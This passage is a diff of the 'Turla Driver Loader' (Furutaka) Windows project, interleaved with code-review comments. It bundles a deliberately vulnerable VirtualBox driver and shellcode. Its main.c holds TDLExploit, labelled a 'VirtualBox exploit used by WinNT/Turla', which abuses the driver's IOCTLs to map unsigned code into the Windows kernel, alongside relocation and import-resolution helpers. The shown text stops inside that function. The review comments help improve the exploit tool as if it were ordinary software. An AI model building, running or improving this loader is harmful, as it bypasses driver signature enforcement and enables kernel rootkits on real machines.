<ClCompile Include="minirtl\_strcmpi.c" />
<ClCompile Include="minirtl\_strcpy.c" />
<ClCompile Include="minirtl\_strend.c" />
<ClCompile Include="minirtl\_strlen.c" />
<ClCompile Include="minirtl\_strncmpi.c" />
<ClCompile Include="sup.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="cui.h" />
<ClInclude Include="global.h" />
<ClInclude Include="instdrv.h" />
<ClInclude Include="minirtl\cmdline.h" />
<ClInclude Include="minirtl\minirtl.h" />
<ClInclude Include="minirtl\rtltypes.h" />
<ClInclude Include="ntos.h" />
<ClInclude Include="resource.h" />
<ClInclude Include="shellcode.h" />
<ClInclude Include="sup.h" />
<ClInclude Include="vbox.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="resource.rc" />
</ItemGroup>
<ItemGroup>
<None Include="drv\vboxdrv_exploitable.sys" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
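Review bot: The project carries Debug|Win32 and Release|Win32 configurations with their own ItemDefinitionGroups although the README states the loader supports x64 Windows only; dropping them, or a comment saying they exist only to keep the solution loadable, avoids someone building and shipping a 32-bit binary that cannot work. `drv\vboxdrv_exploitable.sys` is listed as a `None` item with nothing saying where the file comes from or which VirtualBox release it is; a comment in the project or a README line naming its origin and version lets anyone auditing the repository know what third-party binary is being shipped. `EnablePREfast` is false for Release|x64 while `SDLCheck` is on; running the analyzer in at least one configuration would flag the ignored return values and uninitialized locals present elsewhere in this commit.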


@ -0,0 +1,110 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="minirtl">
<UniqueIdentifier>{b42df48e-a336-4e0e-9516-5a3ed47473ce}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="minirtl\_strcat.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\_strcmpi.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\_strcpy.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\_strend.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\_strlen.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\_strncmpi.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\cmdline.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\u64tohex.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\u64tostr.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\ultohex.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\ultostr.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="sup.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="cui.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="instdrv.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="global.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="ntos.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="minirtl\cmdline.h">
<Filter>minirtl</Filter>
</ClInclude>
<ClInclude Include="minirtl\minirtl.h">
<Filter>minirtl</Filter>
</ClInclude>
<ClInclude Include="minirtl\rtltypes.h">
<Filter>minirtl</Filter>
</ClInclude>
<ClInclude Include="vbox.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="shellcode.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="sup.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="cui.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="instdrv.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="resource.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
<ItemGroup>
<None Include="drv\vboxdrv_exploitable.sys" />
</ItemGroup>
</Project>


@ -0,0 +1,19 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>
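Review bot: This `.vcxproj.user` file holds machine-specific debugger settings with absolute paths under `C:\MAKEEXE\TurlaDriverLoader\...`; Visual Studio regenerates it per user, so it is normally excluded from the repository (`*.user` in .gitignore) rather than committed. If it is kept on purpose, the Tsugumi.sys and TsugumiKernel.sys arguments refer to drivers that do not appear in the visible part of this commit, which will confuse anyone who starts the Debug profile expecting them to exist.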

64
Source/Furutaka/cui.c Normal file

@ -0,0 +1,64 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: CUI.C
*
* VERSION: 1.00
*
* DATE: 18 Jan 2016
*
* Console output.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* cuiPrintText
*
* Purpose:
*
* Output text to the console or file.
*
*/
VOID cuiPrintText(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
)
{
SIZE_T consoleIO;
DWORD bytesIO;
LPWSTR Buffer;
if (lpText == NULL)
return;
consoleIO = _strlen(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL);
Buffer = (LPWSTR)RtlAllocateHeap(RtlGetCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
_strcpy(Buffer, lpText);
if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
consoleIO = _strlen(Buffer);
if (ConsoleOutputEnabled == TRUE) {
WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
}
RtlFreeHeap(RtlGetCurrentPeb()->ProcessHeap, 0, Buffer);
}
}
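Review bot: `if (ConsoleOutputEnabled == TRUE)` compares a BOOL against the constant 1, so any other nonzero value silently takes the WriteFile branch; `if (ConsoleOutputEnabled)` is the intended test. The `consoleIO > MAX_PATH * 4` early return drops long messages without any indication, and the results of WriteConsole/WriteFile are discarded; a comment such as `// Oversize text is refused rather than truncated; callers pass short status lines and output failures are not reported` records both choices so they are not mistaken for omissions. `lpText` is only read, so `_In_ LPCWSTR lpText` is the accurate annotation, applied here and to the declaration in cui.h.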

28
Source/Furutaka/cui.h Normal file

@ -0,0 +1,28 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: CUI.H
*
* VERSION: 1.00
*
* DATE: 18 Jan 2016
*
* Common header file for console ui.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#include "global.h"
VOID cuiPrintText(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
);

Binary file not shown.

50
Source/Furutaka/global.h Normal file

@ -0,0 +1,50 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: GLOBAL.H
*
* VERSION: 1.00
*
* DATE: 01 Feb 2016
*
* Common header file for the program support routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#pragma warning(disable: 6320) //exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
#include <Windows.h>
#include <ntstatus.h>
#include "ntos.h"
#include "minirtl\minirtl.h"
#include "minirtl\rtltypes.h"
#include "minirtl\cmdline.h"
#include "sup.h"
#include "cui.h"
#include "instdrv.h"
#if !defined UNICODE
#error ANSI build is not supported
#endif
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
#pragma comment(lib, "vcruntimed.lib")
#pragma comment(lib, "ucrtd.lib")
#else
#pragma comment(lib, "libvcruntime.lib")
#endif
#endif
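Review bot: `#pragma warning(disable: 4005)` appears to be there to hide the macro redefinitions produced by including `<ntstatus.h>` after `<Windows.h>`; the supported way is to bracket the Windows header, `#define WIN32_NO_STATUS` / `#include <Windows.h>` / `#undef WIN32_NO_STATUS`, followed by the existing `#include <ntstatus.h>`, which lets the redefinition warning stay on for real collisions. Disabling 6102 (value from a failed function call) also silences the analyzer for exactly the pattern in instdrv.c's scmLoadDeviceDriver, where the results of the install and start steps are ignored; keep the warning enabled and fix the sites instead. The `#pragma comment(lib, ...)` block pulls a vcruntime library into a program that otherwise uses minirtl and its own entry point, presumably for the /GS security cookie that /sdl requires; a one-line comment stating that reason would keep the next maintainer from removing it as dead weight.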

265
Source/Furutaka/instdrv.c Normal file

@ -0,0 +1,265 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2016, portions (C) Mark Russinovich, FileMon
*
* TITLE: INSTDRV.C
*
* VERSION: 1.11
*
* DATE: 01 Feb 2016
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* scmInstallDriver
*
* Purpose:
*
* Create SCM service entry describing kernel driver.
*
*/
BOOL scmInstallDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName,
_In_opt_ LPCTSTR ServiceExe
)
{
SC_HANDLE schService;
schService = CreateService(SchSCManager, // SCManager database
DriverName, // name of service
DriverName, // name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_KERNEL_DRIVER, // service type
SERVICE_DEMAND_START, // start type
SERVICE_ERROR_NORMAL, // error control type
ServiceExe, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL // no password
);
if (schService == NULL) {
return FALSE;
}
CloseServiceHandle(schService);
return TRUE;
}
/*
* scmStartDriver
*
* Purpose:
*
* Start service, resulting in SCM drvier load.
*
*/
BOOL scmStartDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
{
SC_HANDLE schService;
BOOL ret;
schService = OpenService(SchSCManager,
DriverName,
SERVICE_ALL_ACCESS
);
if (schService == NULL)
return FALSE;
ret = StartService(schService, 0, NULL)
|| GetLastError() == ERROR_SERVICE_ALREADY_RUNNING;
CloseServiceHandle(schService);
return ret;
}
/*
* scmOpenDevice
*
* Purpose:
*
* Open driver device by symbolic link.
*
*/
BOOL scmOpenDevice(
_In_ LPCTSTR DriverName,
_Inout_opt_ PHANDLE lphDevice
)
{
TCHAR completeDeviceName[64];
HANDLE hDevice;
RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName));
wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName);
hDevice = CreateFile(completeDeviceName,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return FALSE;
if (lphDevice) {
*lphDevice = hDevice;
}
else {
CloseHandle(hDevice);
}
return TRUE;
}
/*
* scmStopDriver
*
* Purpose:
*
* Command SCM to stop service, resulting in driver unload.
*
*/
BOOL scmStopDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
{
INT iRetryCount;
SC_HANDLE schService;
BOOL ret;
SERVICE_STATUS serviceStatus;
ret = FALSE;
schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
if (schService == NULL) {
return ret;
}
iRetryCount = 5;
do {
SetLastError(0);
ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus);
if (ret == TRUE)
break;
if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING)
break;
Sleep(1000);
iRetryCount--;
} while (iRetryCount);
CloseServiceHandle(schService);
return ret;
}
/*
* scmRemoveDriver
*
* Purpose:
*
* Remove service entry from SCM database.
*
*/
BOOL scmRemoveDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
{
SC_HANDLE schService;
BOOL bResult = FALSE;
schService = OpenService(SchSCManager,
DriverName,
DELETE
);
if (schService == NULL) {
return bResult;
}
bResult = DeleteService(schService);
CloseServiceHandle(schService);
return bResult;
}
/*
* scmUnloadDeviceDriver
*
* Purpose:
*
* Combines scmStopDriver and scmRemoveDriver.
*
*/
BOOL scmUnloadDeviceDriver(
_In_ LPCTSTR Name
)
{
SC_HANDLE schSCManager;
BOOL bResult = FALSE;
if (Name == NULL) {
return bResult;
}
schSCManager = OpenSCManager(NULL,
NULL,
SC_MANAGER_ALL_ACCESS
);
if (schSCManager) {
scmStopDriver(schSCManager, Name);
bResult = scmRemoveDriver(schSCManager, Name);
CloseServiceHandle(schSCManager);
}
return bResult;
}
/*
* scmLoadDeviceDriver
*
* Purpose:
*
* Unload if already exists, Create, Load and Open driver instance.
*
*/
BOOL scmLoadDeviceDriver(
_In_ LPCTSTR Name,
_In_opt_ LPCTSTR Path,
_Inout_ PHANDLE lphDevice
)
{
SC_HANDLE schSCManager;
BOOL bResult = FALSE;
if (Name == NULL) {
return bResult;
}
schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager) {
scmRemoveDriver(schSCManager, Name);
scmInstallDriver(schSCManager, Name, Path);
scmStartDriver(schSCManager, Name);
bResult = scmOpenDevice(Name, lphDevice);
CloseServiceHandle(schSCManager);
}
return bResult;
}
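Review bot: scmLoadDeviceDriver ignores the results of scmInstallDriver and scmStartDriver and reports only whether scmOpenDevice succeeded, so a failed CreateService or StartService is indistinguishable from a missing device, and on failure the freshly registered service entry is left behind in the SCM database. The rewrite below chains the steps and removes the entry again when the device cannot be opened; the deliberate up-front scmRemoveDriver keeps its ignored result, as its only purpose is clearing a stale entry. scmOpenDevice formats `DriverName` into a 64-character stack buffer with `wsprintf`, which takes no length; the names passed in this commit are short constants, but a guard such as `if (_strlen(DriverName) + 4 >= sizeof(completeDeviceName) / sizeof(TCHAR)) return FALSE;` using the minirtl routine already used in cui.c keeps the function safe for any caller.
```c
BOOL scmLoadDeviceDriver(
    _In_ LPCTSTR Name,
    _In_opt_ LPCTSTR Path,
    _Inout_ PHANDLE lphDevice
    )
{
    // … unchanged: locals and the Name == NULL early return …

    schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (schSCManager) {
        // A stale entry from an earlier run is removed on purpose; its result does not matter.
        scmRemoveDriver(schSCManager, Name);
        if (scmInstallDriver(schSCManager, Name, Path) &&
            scmStartDriver(schSCManager, Name))
        {
            bResult = scmOpenDevice(Name, lphDevice);
        }
        if (!bResult) {
            // Do not leave a registered (and possibly started) service behind on failure.
            scmStopDriver(schSCManager, Name);
            scmRemoveDriver(schSCManager, Name);
        }
        CloseServiceHandle(schSCManager);
    }
    return bResult;
}
```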

54
Source/Furutaka/instdrv.h Normal file

@ -0,0 +1,54 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015, portions (C) Mark Russinovich, FileMon
*
* TITLE: INSTDRV.H
*
* VERSION: 1.10
*
* DATE: 10 Mar 2015
*
* Common header file for the program SCM usage.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
BOOL scmInstallDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName,
_In_opt_ LPCTSTR ServiceExe
);
BOOL scmStartDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
BOOL scmOpenDevice(
_In_ LPCTSTR DriverName,
_Inout_opt_ PHANDLE lphDevice
);
BOOL scmStopDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
BOOL scmRemoveDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
BOOL scmUnloadDeviceDriver(
_In_ LPCTSTR Name
);
BOOL scmLoadDeviceDriver(
_In_ LPCTSTR Name,
_In_opt_ LPCTSTR Path,
_Inout_ PHANDLE lphDevice
);
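Review bot: instdrv.h has no `#pragma once`, unlike cui.h and global.h in the same commit; add it right after the license header so the three headers follow one convention. `lphDevice` in scmLoadDeviceDriver is annotated `_Inout_` although the function only writes it (scmOpenDevice stores the handle and never reads the previous value); `_Out_ PHANDLE lphDevice` is the accurate annotation, here and in the definition in instdrv.c.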

838
Source/Furutaka/main.c Normal file

@ -0,0 +1,838 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: MAIN.C
*
* VERSION: 1.00
*
* DATE: 04 Feb 2016
*
* Furutaka entry point.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include <process.h>
#include "vbox.h"
#include "shellcode.h"
#pragma data_seg("shrd")
volatile LONG g_lApplicationInstances = 0;
#pragma data_seg()
#pragma comment(linker, "/Section:shrd,RWS")
HINSTANCE g_hInstance;
HANDLE g_ConOut = NULL;
HANDLE g_hVBox = INVALID_HANDLE_VALUE;
BOOL g_ConsoleOutput = FALSE;
BOOL g_VBoxInstalled = FALSE;
WCHAR BE = 0xFEFF;
#define VBoxDrvSvc TEXT("VBoxDrv")
#define supImageName "furutaka"
#define supImageHandle 0x1a000
#define PAGE_SIZE 0x1000
#define scDataOffset 0x214 //shellcode data offset
#define T_LOADERTITLE TEXT("Turla Driver Loader v1.0 (04/02/16)")
#define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n")
#define T_LOADERRUN TEXT("Another instance running, close it before\r\n")
#define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n")
#define T_LOADERINTRO TEXT("Turla Driver Loader v1.0.0 started\r\n(c) 2016 TDL Project\r\nSupported x64 OS : 7 and above\r\n")
/*
* TDLVBoxInstalled
*
* Purpose:
*
* Check VirtualBox software installation state.
*
*/
BOOL TDLVBoxInstalled(
VOID
)
{
BOOL bPresent = FALSE;
LRESULT lRet;
HKEY hKey = NULL;
lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"),
0, KEY_READ, &hKey);
bPresent = (hKey != NULL);
if (hKey) {
RegCloseKey(hKey);
}
return bPresent;
}
/*
* TDLRelocImage
*
* Purpose:
*
* Process image relocs.
*
*/
void TDLRelocImage(
ULONG_PTR Image,
ULONG_PTR NewImageBase
)
{
PIMAGE_OPTIONAL_HEADER popth;
PIMAGE_BASE_RELOCATION rel;
DWORD_PTR delta;
LPWORD chains;
DWORD c, p, rsz;
popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader;
if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image +
popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
delta = (DWORD_PTR)NewImageBase - popth->ImageBase;
c = 0;
while (c < rsz) {
p = sizeof(IMAGE_BASE_RELOCATION);
chains = (LPWORD)((PBYTE)rel + p);
while (p < rel->SizeOfBlock) {
switch (*chains >> 12) {
case IMAGE_REL_BASED_HIGHLOW:
*(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
break;
case IMAGE_REL_BASED_DIR64:
*(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
break;
}
chains++;
p += sizeof(WORD);
}
c += rel->SizeOfBlock;
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
}
}
}
/*
* TDLGetProcAddress
*
* Purpose:
*
* Get NtOskrnl procedure address.
*
*/
ULONG_PTR TDLGetProcAddress(
ULONG_PTR KernelBase,
ULONG_PTR KernelImage,
LPCSTR FunctionName
)
{
ANSI_STRING cStr;
ULONG_PTR pfn = 0;
RtlInitString(&cStr, FunctionName);
if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn)))
return 0;
return KernelBase + (pfn - KernelImage);
}
/*
* TDLResolveKernelImport
*
* Purpose:
*
* Resolve import (ntoskrnl only).
*
*/
void TDLResolveKernelImport(
ULONG_PTR Image,
ULONG_PTR KernelImage,
ULONG_PTR KernelBase
)
{
PIMAGE_OPTIONAL_HEADER popth;
ULONG_PTR ITableVA, *nextthunk;
PIMAGE_IMPORT_DESCRIPTOR ITable;
PIMAGE_THUNK_DATA pthunk;
PIMAGE_IMPORT_BY_NAME pname;
ULONG i;
popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader;
if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT)
return;
ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
if (ITableVA == 0)
return;
ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA);
if (ITable->OriginalFirstThunk == 0)
pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk);
else
pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk);
for (i = 0; pthunk->u1.Function != 0; i++, pthunk++) {
nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk);
if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) {
pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData);
nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, pname->Name);
}
else
nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff));
}
}
/*
* TDLExploit
*
* Purpose:
*
* VirtualBox exploit used by WinNT/Turla.
*
*/
void TDLExploit(
LPVOID Shellcode,
ULONG CodeSize
)
{
SUPCOOKIE Cookie;
SUPLDROPEN OpenLdr;
DWORD bytesIO = 0;
RTR0PTR ImageBase = NULL;
ULONG_PTR paramOut;
PSUPLDRLOAD pLoadTask = NULL;
SUPSETVMFORFAST vmFast;
SUPLDRFREE ldrFree;
SIZE_T memIO;
WCHAR text[256];
while (g_hVBox != INVALID_HANDLE_VALUE) {
RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE));
Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE;
Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN;
Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT;
Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
Cookie.Hdr.rc = 0;
Cookie.u.In.u32ReqVersion = 0;
Cookie.u.In.u32MinVersion = 0x00070002;
RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC));
if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE,
&Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie,
SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL))
{
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE);
break;
}
RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr));
OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN;
OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT;
OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
OpenLdr.Hdr.rc = 0;
OpenLdr.u.In.cbImage = CodeSize;
RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName));
if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr,
SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr,
SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL))
{
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x"));
u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
ImageBase = OpenLdr.u.Out.pvImageBase;
memIO = PAGE_SIZE + CodeSize;
NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pLoadTask == NULL)
break;
pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
pLoadTask->Hdr.cbIn =
(ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + CodeSize;
pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT;
pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC;
pLoadTask->Hdr.rc = 0;
pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0;
pLoadTask->u.In.pvImageBase = ImageBase;
pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle;
pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase;
